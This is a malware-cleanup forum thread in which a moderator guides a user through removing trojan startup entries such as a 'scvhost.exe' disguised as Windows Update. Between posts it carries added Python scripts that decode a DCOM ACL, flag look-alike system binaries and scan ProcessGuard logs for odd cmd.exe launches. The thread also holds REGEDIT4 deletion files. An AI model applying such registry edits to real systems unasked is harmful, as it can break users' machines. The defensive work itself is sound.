help i have trojan horse collected.5.L [RESOLVED]



#136 duglartis (Member, Topic Starter, 159 posts)
Hello, thanks for the help.
Here is the txt file:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"DefaultLaunchPermission"=hex:01,00,04,80,64,00,00,00,80,00,00,00,00,00,00,00,\
14,00,00,00,02,00,50,00,03,00,00,00,00,00,18,00,01,00,00,00,01,01,00,00,00,\
00,00,05,12,00,00,00,00,00,00,00,00,00,18,00,01,00,00,00,01,01,00,00,00,00,\
00,05,04,00,00,00,00,00,00,00,00,00,18,00,01,00,00,00,01,02,00,00,00,00,00,\
05,20,00,00,00,20,02,00,00,01,05,00,00,00,00,00,05,15,00,00,00,a0,5f,84,1f,\
5e,2e,6b,49,ce,12,03,03,f4,01,00,00,01,05,00,00,00,00,00,05,15,00,00,00,a0,\
5f,84,1f,5e,2e,6b,49,ce,12,03,03,f4,01,00,00
"EnableDCOM"="N"
"EnableRemoteConnect"="N"
"MSN Messanger"="msnmsng.exe"
"Distributed Tracking Link Coordinator"="msvcsq.exe"

cheers

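The DefaultLaunchPermission value in that export is a self-relative SECURITY_DESCRIPTOR stored as REG_BINARY, so it can be read rather than just eyeballed. The script below is an added example and not code from the thread: it decodes the hex exactly as posted above, using only the standard library, and names the SIDs with the usual well-known mappings (SYSTEM, INTERACTIVE, BUILTIN\Administrators); nothing else is assumed. On that blob it shows a DACL of three ACCESS_ALLOWED ACEs with mask 0x1 (COM_RIGHTS_EXECUTE) for S-1-5-18, S-1-5-4 and S-1-5-32-544, and owner and group both the RID 500 account (the built-in Administrator) of the machine's own domain SID. That is an ordinary local-launch grant set, so the ACL itself is not where the infection lives; what does not belong under HKLM\SOFTWARE\Microsoft\Ole is the pair of REG_SZ values that name executables, which is what the following reply targets.

```python
"""Decode the DefaultLaunchPermission REG_BINARY value from the posted .reg export.

Added example (not from the thread): parses a self-relative SECURITY_DESCRIPTOR
with the standard library only, so the DCOM launch ACL reads as SIDs and
access masks instead of a hex blob.
"""
import struct

# Hex bytes copied from the .reg export in the post above (continuation
# backslashes removed, lines joined).
DEFAULT_LAUNCH_PERMISSION_HEX = (
    "01,00,04,80,64,00,00,00,80,00,00,00,00,00,00,00,"
    "14,00,00,00,02,00,50,00,03,00,00,00,00,00,18,00,01,00,00,00,01,01,00,00,00,"
    "00,00,05,12,00,00,00,00,00,00,00,00,00,18,00,01,00,00,00,01,01,00,00,00,00,"
    "00,05,04,00,00,00,00,00,00,00,00,00,18,00,01,00,00,00,01,02,00,00,00,00,00,"
    "05,20,00,00,00,20,02,00,00,01,05,00,00,00,00,00,05,15,00,00,00,a0,5f,84,1f,"
    "5e,2e,6b,49,ce,12,03,03,f4,01,00,00,01,05,00,00,00,00,00,05,15,00,00,00,a0,"
    "5f,84,1f,5e,2e,6b,49,ce,12,03,03,f4,01,00,00"
)

# SECURITY_DESCRIPTOR_CONTROL bits used here.
SE_DACL_PRESENT = 0x0004
SE_SACL_PRESENT = 0x0010
SE_SELF_RELATIVE = 0x8000
COM_RIGHTS_EXECUTE = 0x0001

ACE_TYPES = {0: "ACCESS_ALLOWED", 1: "ACCESS_DENIED"}
WELL_KNOWN_SIDS = {
    "S-1-5-4": "NT AUTHORITY\\INTERACTIVE",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}


def reg_hex_to_bytes(text):
    """Turn the 'hex:01,00,...' form regedit writes (with or without the
    trailing-backslash line continuations) into bytes."""
    cleaned = text.replace("hex:", "").replace("\\", "").replace("\n", "").replace(" ", "")
    return bytes(int(b, 16) for b in cleaned.split(",") if b)


def parse_sid(buf, off):
    """Parse a binary SID at buf[off]; return (string SID, byte length)."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")  # 48-bit, big-endian
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)  # sub-authorities, little-endian
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * sub_count


def parse_acl(buf, off):
    """Parse an ACL header and its ACEs into a list of dicts."""
    _rev, _sbz1, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", buf, off)
    aces, pos = [], off + 8
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", buf, pos)
        (mask,) = struct.unpack_from("<I", buf, pos + 4)
        sid, _ = parse_sid(buf, pos + 8)
        aces.append({
            "type": ACE_TYPES.get(ace_type, ace_type),
            "flags": ace_flags,
            "mask": mask,
            "sid": sid,
            "account": WELL_KNOWN_SIDS.get(sid, sid),
        })
        pos += ace_size  # advance by the ACE's own size so unusual ACE types do not desync us
    return aces


def parse_security_descriptor(buf):
    """Parse a self-relative SECURITY_DESCRIPTOR (the layout stored in REG_BINARY)."""
    revision, _sbz1, control, owner_off, group_off, sacl_off, dacl_off = \
        struct.unpack_from("<BBHIIII", buf, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative SECURITY_DESCRIPTOR")
    return {
        "control": control,
        "owner": parse_sid(buf, owner_off)[0] if owner_off else None,
        "group": parse_sid(buf, group_off)[0] if group_off else None,
        "dacl": parse_acl(buf, dacl_off) if control & SE_DACL_PRESENT and dacl_off else None,
        "sacl": parse_acl(buf, sacl_off) if control & SE_SACL_PRESENT and sacl_off else None,
    }


def describe(sd):
    """One line for owner/group, then one line per DACL ACE."""
    lines = ["owner=%s group=%s" % (sd["owner"], sd["group"])]
    for ace in sd["dacl"] or []:
        rights = "COM_RIGHTS_EXECUTE" if ace["mask"] == COM_RIGHTS_EXECUTE else hex(ace["mask"])
        lines.append("%s %s -> %s" % (ace["type"], rights, ace["account"]))
    return lines


if __name__ == "__main__":
    sd = parse_security_descriptor(reg_hex_to_bytes(DEFAULT_LAUNCH_PERMISSION_HEX))
    print("\n".join(describe(sd)))
```

The parser honours AceSize and the header offsets rather than assuming fixed layouts, so it also copes with descriptors that carry a SACL or inheritance flags; for this value it reports no SACL and three allow ACEs, which is what you want to confirm before deciding the key was only abused as a hiding place for the two string values.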
#137 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
Yiiihhaaaa :)
We found where it was hiding. (I think)

Copy the part in bold below into Notepad and save it as getoutofmyole.reg.
Set the file type to "All files".

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"MSN Messanger"=-
"Distributed Tracking Link Coordinator"=-


Double-click that file and confirm that you want to merge it with the registry.

Then reboot and see if these files are present:
msnmsng.exe
msvcsq.exe

If so delete those as well. Watch the names carefully. Don't delete anything just because it looks like them. :)

Regards,

#138 duglartis (Member, Topic Starter, 159 posts)
Hello,
I have followed the instructions (had one instance of the FTP thing since). I have done the search on the files and this is what it came up with.
For msnmsng.exe:
spybot.txt c:\
collecteddata_105.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1095.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1575.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1635.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1665.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1695.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1755.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1784.xml c:\windows\pchealth\helpctr\datacoll
A search on msvcsq revealed the following:
spybot.txt c:\
ad-awarelog2005-06-02-20-06-42.txt c:\documents and settings\dug and tania\mydocuments
ad-aware.txt c:\documents and settings\dug and tania\mydocuments
ad-awarelog2005-06-02-20-14-26.txt c:\documents and settings\dug and tania\mydocuments
ad-aware2.txt c:\documents and settings\dug and tania\mydocuments
ad-awarelog2005-06-02-20-44-04.txt c:\documents and settings\dug and tania\mydocuments
collecteddata_1575.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1605.xml c:\windows\pchealth\helpctr\datacoll
I have deleted nothing so far. Thanks for your help.

#139 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
I'm sorry. It looks as if you did a search for files containing those names, but this time I wanted you to search for the files themselves.

By the looks of it msvcsq was already removed by AdAware.

Keep an eye on the Processguard logs and let me know if the files are found.

Also I'd like to see the content of one of those xml files.

I think this will be the most recent:
c:\windows\pchealth\helpctr\datacoll\collecteddata_1784.xml

You can open them by right-clicking and opening in Notepad.
Have a quick look before you post them, just in case they contain personal info.

Regards,

#140 duglartis (Member, Topic Starter, 159 posts)
Hello again,
I have got hold of another hard drive with a clean install of XP and now have the infected drive as a slave drive. Can you help me with this:
How do I clean off the XP installation from the infected hard drive without losing all the installed programmes on there?
Is this possible/worthwhile?
Or should I just save the files I need and reformat?
Thanks so much for your help; I really appreciate the effort you have put in over the last 8 weeks.
Cheers

#141 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
To get the registry in order for your new setup, you will have to install the programs from scratch.
If you want to keep the infected drive in, you can choose existing folders on that drive to install the program files into, during the install process.
That might save you some time and you will keep the documents you created.

But if you do not have the opportunity to keep the slave drive, the scenario you described fits.

I was glad to help but it would have been nicer to solve this puzzle.

Please do have a look at my site about removing and preventing spyware.

Regards,

#142 duglartis (Member, Topic Starter, 159 posts)
Hello again,
I have not changed anything on the infected drive as yet, and if you still wish to solve it I am keen to keep going; it has been quite a learning experience for me. I have looked for these:
msnmsng.exe
msvcsq.exe
but did not find them.
Here is the logfile txt that you wished to look at:
[Contents of collecteddata_1784.xml: Win32_StartupCommand instances on host MYCOMPUTER, namespace root\cimv2. The file states each entry twice, as INSTANCEPATH key bindings and again as INSTANCE properties; each is listed once below. Run = SOFTWARE\Microsoft\Windows\CurrentVersion\Run.]

Name | Command | Location | User
TkBellExe | "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot | HKLM\Run | All Users
!1_pgaccount | "C:\Program Files\ProcessGuard\pgaccount.exe" | HKLM\Run | All Users
!1_ProcessGuard_Startup | "C:\Program Files\ProcessGuard\procguard.exe" -minimize | HKU\S-1-5-21-2000478354-1677128483-725345543-1003\Run | MYCOMPUTER\Dug And Tania
QuickTime Task | "C:\Program Files\QuickTime\qttask.exe" -atboottime | HKLM\Run | All Users
KernelFaultCheck | %systemroot%\system32\dumprep 0 -k | HKLM\Run | All Users
Advanced Protection System | advpsys.exe | HKU\.DEFAULT\Run | .DEFAULT
Advanced Protection System | advpsys.exe | HKU\S-1-5-18\Run | NT AUTHORITY\SYSTEM
RegProt | c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start | HKLM\Run | All Users
AdaptecDirectCD | C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe | HKLM\Run | All Users
AVG7_CC | C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP | HKLM\Run | All Users
AVG7_EMC | C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe | HKLM\Run | All Users
AVG7_Run | C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe /RUNONCE | HKU\.DEFAULT\Run | .DEFAULT
AVG7_Run | C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe /RUNONCE | HKU\S-1-5-18\Run | NT AUTHORITY\SYSTEM
Microsoft Office | C:\PROGRA~1\MICROS~1\Office\Osa9.exe -b -l | Common Startup | All Users
NeroCheck | C:\WINDOWS\System32\\NeroCheck.exe | HKLM\Run | All Users
CTFMON.EXE | C:\WINDOWS\System32\CTFMON.EXE | HKU\.DEFAULT\Run | .DEFAULT
CTFMON.EXE | C:\WINDOWS\System32\CTFMON.EXE | HKU\S-1-5-18\Run | NT AUTHORITY\SYSTEM
HPDJ Taskbar Utility | C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe | HKLM\Run | All Users
desktop | desktop.ini | Common Startup | All Users
desktop | desktop.ini | Startup | .DEFAULT
desktop | desktop.ini | Startup | MYCOMPUTER\Dug And Tania
desktop | desktop.ini | Startup | NT AUTHORITY\SYSTEM
Windows Media Player | msa.exe | HKU\.DEFAULT\Run | .DEFAULT
Windows Media Player | msa.exe | HKU\S-1-5-18\Run | NT AUTHORITY\SYSTEM
MSN Messanger | msnmsng.exe | HKU\.DEFAULT\Run | .DEFAULT
MSN Messanger | msnmsng.exe | HKU\S-1-5-18\Run | NT AUTHORITY\SYSTEM
nwiz | nwiz.exe /install | HKLM\Run | All Users
NvCplDaemon | RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup | HKLM\Run | All Users
Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">rundll32.exe nview.dll,nViewLoadHook</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-21-2000478354-1677128483-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">NVIEW</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">MYCOMPUTER\Dug And Tania</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>rundll32.exe nview.dll,nViewLoadHook</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-21-2000478354-1677128483-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>NVIEW</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>MYCOMPUTER\Dug And Tania</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">scvhost.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Microsoft Windows Updata</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE 
CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>scvhost.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Microsoft Windows Updata</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">scvhost.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Microsoft Windows Updata</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>scvhost.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Microsoft Windows Updata</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH></DECLGROUP.WITHPATH></DECLARATION></CIM>
Cheers

#143
Metallica
    Spyware Veteran
  • GeekU Moderator
  • 31,942 posts
Can you look if any of these files are present?

advpsys.exe
msa.exe
scvhost.exe <= Note the spelling

Also do a RegSrch for that last one, scvhost.exe.

Regards,

#144
duglartis
    Member
  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello, RegSrch found this:
REGEDIT4
; RegSrch.vbs © Bill James

; Registry search results for string "scvhost.exe" 22/08/2005 19:24:54

; NOTE: This file will be deleted when you close WordPad.
; You must manually save this file to a new location if you want to refer to it again later.
; (If you save the file with a .reg extension, you can use it to restore any Registry changes you make to these values.)


[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"="scvhost.exe"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"="scvhost.exe"

No instances of advpsys.exe or msa.exe were found.
Thanks for your help.

#145
Metallica
    Spyware Veteran
  • GeekU Moderator
  • 31,942 posts
And the file itself? (scvhost.exe)

Was that there as well?
Looking at the way they are starting it, it is probably in Windows\System32 or Windows.

Copy the part in bold below into Notepad and save it as scvhost.reg.
Set Filetype to "All files".

REGEDIT4

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"=-

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"=-


Double-click that file and confirm you want to merge it with the registry.

Regards,
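
To automate the check in posts #143 to #145 (a Run value whose program name imitates a system binary, then a REGEDIT4 file with "Name"=- that deletes it), here is an added Python example; it is not code from the thread or from RegSrch. The REGEDIT4 text it parses is a constructed sample in RegSrch's output layout, and the list of imitated system binaries is an assumption of the example.

```python
"""Added example (not from the thread or from RegSrch): flag Run-key values
whose command imitates a Windows system binary, then build the REGEDIT4
removal file ("Name"=-) of the kind the moderator's scvhost.reg uses."""
import re

# Assumed list: legitimate Windows binaries whose names malware often imitates.
KNOWN_SYSTEM_BINARIES = {
    "svchost.exe", "lsass.exe", "services.exe", "winlogon.exe", "explorer.exe",
    "spoolsv.exe", "smss.exe", "csrss.exe", "rundll32.exe", "wuauclt.exe",
}

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')


def parse_reg(text):
    """Return (key, value_name, data) triples for the string values in a
    REGEDIT4/5 file. Comment lines (;) and non-string data are skipped."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            entries.append((key, m.group("name"), m.group("data")))
    return entries


def osa_distance(a, b):
    """Optimal string alignment distance: insert/delete/substitute cost 1,
    and one adjacent transposition (scvhost vs svchost) also costs 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def lookalike_of(basename):
    """Return the system binary a file name imitates (one edit or one
    transposition away), or None for exact system names and unrelated names."""
    name = basename.lower()
    if name in KNOWN_SYSTEM_BINARIES:
        return None
    for real in sorted(KNOWN_SYSTEM_BINARIES):
        if osa_distance(name, real) == 1:
            return real
    return None


def command_basename(data):
    """File name of the program a Run value launches: the first token,
    honouring a quoted path, with any directory part removed."""
    data = data.strip()
    if data.startswith('"'):
        token = data[1:].split('"', 1)[0]
    else:
        token = data.split(None, 1)[0] if data else ""
    return token.rsplit("\\", 1)[-1]


def suspicious_run_entries(text):
    """(key, name, data, imitated_binary) for every ...\\CurrentVersion\\Run
    value whose program name is a look-alike of a system binary."""
    hits = []
    for key, name, data in parse_reg(text):
        if not key.lower().endswith("\\currentversion\\run"):
            continue
        real = lookalike_of(command_basename(data))
        if real:
            hits.append((key, name, data, real))
    return hits


def removal_reg(hits):
    """REGEDIT4 text that deletes each flagged value ("Name"=-)."""
    lines = ["REGEDIT4", ""]
    for key, name, _data, _real in hits:
        lines += [f"[{key}]", f'"{name}"=-', ""]
    return "\n".join(lines)


# Constructed sample in RegSrch's output layout (not the poster's real results).
SAMPLE = r"""REGEDIT4
; RegSrch-style search results (constructed sample)

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"="scvhost.exe"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Updata"="scvhost.exe"
"NvCplDaemon"="RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup"
"AVG7_CC"="C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP"
"""

if __name__ == "__main__":
    found = suspicious_run_entries(SAMPLE)
    for key, name, data, real in found:
        print(f"{key}\n  {name} = {data}  (imitates {real})")
    print(removal_reg(found))
```

A bare file name such as scvhost.exe in a Run value carries no directory, so after flagging it the file itself still has to be located on the PATH search order (System32 and Windows first), which is the separate step the moderator asks about.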

#146
duglartis
    Member
  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello,
I have done the registry merge. I could not find scvhost.exe; I looked again before I carried out the reg merge.
Where to from here?
Thanks for your help.
Cheers

#147
Metallica
    Spyware Veteran
  • GeekU Moderator
  • 31,942 posts
I want to have a look at a new ProcessGuard log,
if there is one with cmd.exe in it (not started by you).

And a fresh HijackThis log.

Regards,
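
As an added example (not code from the thread or from ProcessGuard), here is a Python parser that picks the cmd.exe records out of a ProcessGuard execution log and reports the ones not started by the user's own shell, which is the check asked for above. The log text is a constructed sample in ProcessGuard's three-line record layout with the command lines replaced by harmless placeholders; treating explorer.exe as the only legitimate launcher of a command prompt is an assumption of the example.

```python
"""Added example (not from the thread or from ProcessGuard): find cmd.exe
launches in a ProcessGuard execution log whose parent is not the user's
shell, or is a process ProcessGuard could not identify."""
import re

# One record is three lines: the verdict line, the parent line, the command line.
HEADER_RE = re.compile(
    r'^(?P<when>\w{3} \d{1,2} - \d{2}:\d{2}:\d{2}) \[EXECUTION\] '
    r'"(?P<image>[^"]+)" was (?P<verdict>allowed to run|blocked from running)$')
PARENT_RE = re.compile(r'^\[EXECUTION\] Started by "(?P<parent>[^"]+)" \[(?P<pid>\d+)\]$')
CMDLINE_RE = re.compile(r'^\[EXECUTION\] Commandline - \[ (?P<cmd>.*?) ?\]$')

# Assumption: an interactive user opens a command prompt from Explorer only.
USER_SHELLS = {"c:\\windows\\explorer.exe"}


def parse_pg_log(text):
    """Group the log into records: when, image, verdict, parent, pid, cmd."""
    records, current = [], None
    for line in text.splitlines():
        line = line.rstrip()
        m = HEADER_RE.match(line)
        if m:
            current = {"when": m.group("when"), "image": m.group("image").lower(),
                       "verdict": m.group("verdict"), "parent": None,
                       "pid": None, "cmd": ""}
            records.append(current)
            continue
        if current is None:          # banner lines such as "---Process Guard Log Started---"
            continue
        m = PARENT_RE.match(line)
        if m:
            current["parent"] = m.group("parent").lower()
            current["pid"] = int(m.group("pid"))
            continue
        m = CMDLINE_RE.match(line)
        if m:
            current["cmd"] = m.group("cmd")
    return records


def suspicious_cmd_launches(text):
    """Records where cmd.exe ran or was blocked and the parent was not a
    user shell. A service such as lsass.exe spawning cmd.exe, or an
    "Unknown Process" parent, is what the moderator wants to see."""
    hits = []
    for r in parse_pg_log(text):
        if not r["image"].endswith("\\cmd.exe"):
            continue
        parent = r["parent"] or "unknown process"
        if parent in USER_SHELLS:
            continue
        hits.append(r)
    return hits


# Constructed sample in ProcessGuard's layout; command lines are placeholders.
SAMPLE_LOG = """---Process Guard Log Started---
Tue 23 - 19:01:47 [EXECUTION] "c:\\program files\\mozilla firefox\\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\\windows\\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\\program files\\mozilla firefox\\firefox.exe" ]
Tue 23 - 19:02:42 [EXECUTION] "c:\\windows\\system32\\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\\windows\\system32\\lsass.exe" [536]
[EXECUTION] Commandline - [ cmd /k echo constructed-sample-command ]
Tue 23 - 19:03:10 [EXECUTION] "c:\\windows\\system32\\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\\windows\\explorer.exe" [1260]
[EXECUTION] Commandline - [ "c:\\windows\\system32\\cmd.exe" ]
Tue 23 - 19:04:00 [EXECUTION] "c:\\windows\\system32\\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2016]
[EXECUTION] Commandline - [ cmd /c echo constructed-sample ]
"""

if __name__ == "__main__":
    for r in suspicious_cmd_launches(SAMPLE_LOG):
        print(f'{r["when"]}: cmd.exe {r["verdict"]}, parent {r["parent"]} '
              f'[{r["pid"]}], command: {r["cmd"]}')
```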

#148
duglartis
    Member
  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello,
here is the latest HijackThis log, followed by the PG log for the last 3 days.
Logfile of HijackThis v1.99.1
Scan saved at 7:11:31 p.m., on 24/08/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\savedump.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\documents and settings\dug and tania\my documents\downloads\regprot.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\WINDOWS\System32\rundll32.exe
C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://netaccess.co.nz/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O4 - HKLM\..\Run: [RegProt] c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
